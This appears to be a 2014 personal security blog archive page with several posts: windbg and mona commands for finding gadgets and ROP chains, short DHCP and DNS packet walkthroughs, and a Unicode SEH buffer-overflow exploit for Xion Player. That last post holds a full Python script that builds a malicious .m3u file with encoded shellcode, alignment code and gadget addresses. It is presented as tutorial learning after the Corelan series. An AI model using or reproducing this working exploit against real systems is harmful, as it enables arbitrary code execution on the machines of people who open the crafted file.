Wednesday, December 31, 2014

Useful windbg and mona commands for exploit writing



Find opcodes of instructions, say, "jmp esp"
0:000>a //press Enter key once
Input>jmp esp //press Enter key once
7c901214 jmp esp
0:000> u 7c901214 
ntdll!DbgUserBreakPoint+0x2:
7c901214 ffe4            jmp     esp

So "ffe4" are the opcodes for "jmp esp"

Opcode       Instruction
b0 01     mov al,1
c3             ret
0:000> s -b 0x00000000 L?0xffffffff "b001c3"
Syntax error at '"b001c3"'
0:000> s -b 0x00000000 L?0xffffffff b0 01 c3
77eda3fa  b0 01 c3 90 90 90 90 90-8b 41 14 66 8b 08 f6 c1
7c80c190  b0 01 c3 90 90 90 90 90-8b ff 55 8b ec 8b 45 0c
0:000> u 77eda3fa  
RPCRT4!NDR_PIPE_HELPER32::GotoNextParam+0x1b:
77eda3fa b001            mov     al,1

Opcode       Instruction
b0 01     mov al,1
c3             ret n
0:000> s -b 0x00000000 L?0xffffffff b0 01 c2
71a517a1  b0 01 c2 0c 00 90 90 90-90 90 ff 25 18 70 a8 71  ...........%.p.q
77eda6b2  b0 01 c2 08 00 90 90 90-90 90 32 c0 c3 90 90 90  ..........2.....
7c9518ea  b0 01 c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  ............U..V
0:000> u 71a517a1  
mswsock+0x17a1:
71a517a1 b001            mov     al,1
71a517a3 c20c00          ret     0Ch

push esp / pop ebp / ret
0:000> s -b 0x00000000 L?0xffffffff 54 5D c2
77eedc68  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V
77eee353  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V
77eee7b3  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 51  T]..........U..Q
77eeecd6  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 6a  T]..........U..j
77eeee84  54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56  T]..........U..V

Random mona commands, might be useful during exploit writing
!mona suggest
!mona assemble -s "mov eax#ret"

Find all executable locations that have a pointer to “jmp ecx”
!mona find -type instr -s "jmp ecx" -p2p -x X

Search for a push (any register), later followed by pop eax, directly followed by inc eax, ending the chain with a retn
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn"

!mona findwild -s "mov r16#*#retn"

ROP gadgets from all loaded DLL's
!mona rop -n -o

ROP gadget from specific DLL
!mona rop -m msvcr71.dll -n

ROP gadgets without bad characters
!mona rop -m msvcr71.dll -n -cpb '\x00\x0a\x0d'

Find stackpivot at offset 1500
!mona stackpivot -n -o -distance 1500

https://labs.snort.org/awbo/windbg.txt
http://windbg.info/doc/1-common-cmds.html
http://blog.disects.com/2014/04/windbg-useful-debugging-commands.html


Thursday, December 25, 2014

DHCP: No IP, to IP!

DHCP stands for Dynamic Host Configuration Protocol, used to assign an IP address to a machine connected to a network. DHCP uses ports 67 and 68 on top of UDP.

In this post we will see how a machine gets an IP Address.

Figure DHCP Client Communication Sequence

    Source     Dest        Source     Dest              Packet
   MAC addr   MAC addr    IP addr    IP addr           Description
   -----------------------------------------------------------------
   Client     Broadcast   0.0.0.0    255.255.255.255   DHCP Discover
   DHCPsrvr   Broadcast   DHCPsrvr   255.255.255.255   DHCP Offer
   Client     Broadcast   0.0.0.0    255.255.255.255   DHCP Request
   DHCPsrvr   Broadcast   DHCPsrvr   255.255.255.255   DHCP ACK
Source (Microsoft)
Broadcast MAC Address is ff:ff:ff:ff:ff:ff

Below 4 packets (Packet number 2 to 5) are mainly used for fetching an IP. Lets get into packet level details of communication.

Machine which is connected to the network sends a broadcast packet using 255.255.255.255 as destination address which is an IP Address lease request will be responded back by the DHCP Server as DHCP Offer message. A DHCP client migh also send it's previous IP Address part of the discover packet.
Figure DHCP Discover

DHCP server takes a non assigned IP address from the address pool and makes a lease offer to client.

Figure DHCP Offer

Figure DHCP Request

Figure DHCP ACK

In the above communication, we need to mainly observer the source and destination MAC addresses used.

Point to remember, bootp is the wireshark filter, not dhcp.

http://support.microsoft.com/KB/169289


Thursday, December 18, 2014

DNS CNAME Record Query/Response


DNS CNAME Query


DNS CNAME Response

DNS A Record Query/Response


A Record Query for www.google.co.in


A Record Response for www.google.co.in



A Record Query for domain www.google.com


A Record Response for domain www.google.com


Friday, December 12, 2014

Xion Player Unicode Exploit

Unicode Exploitation Techniques


Below instructions make us point to shellcode
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe
import struct

total_buf_size=5000
# 228 offset
buf1 = "A" * 228
#nseh = "MM"
nseh = "\x61\x62"
# seh = "NN"
seh = "\x15\x45"
print "seh: ", len(seh)

prep_stack = "D"
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x55" #push ebp
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x58" #pop eax=> ebp into eax
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300
prep_stack = prep_stack + "\x6e" #pop/align
print "prep_stack len=", len(prep_stack)

prep_jump = "\x50"  #push eax
prep_jump = prep_jump + "\x6d"  #nop/align
prep_jump = prep_jump + "\xc3"  #ret
print "prep_jump len=", len(prep_jump)


# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D"*107

shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA"

remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode)))
payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
  fh = open("xion_uni_m3u.m3u", "w")
  fh.write(payload)
  fh.close()
except:
  print "Unable to create m3u file!\n"

To Generate cyclic pattern
!mona pc 1500

To find offset of in cyclic pattern at the time of crash
!mona findmsp

To search registers holding pop/pop/ret
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. Following is the list of address of our interest, search for string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret  |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret  | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret  | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)

This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.

References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html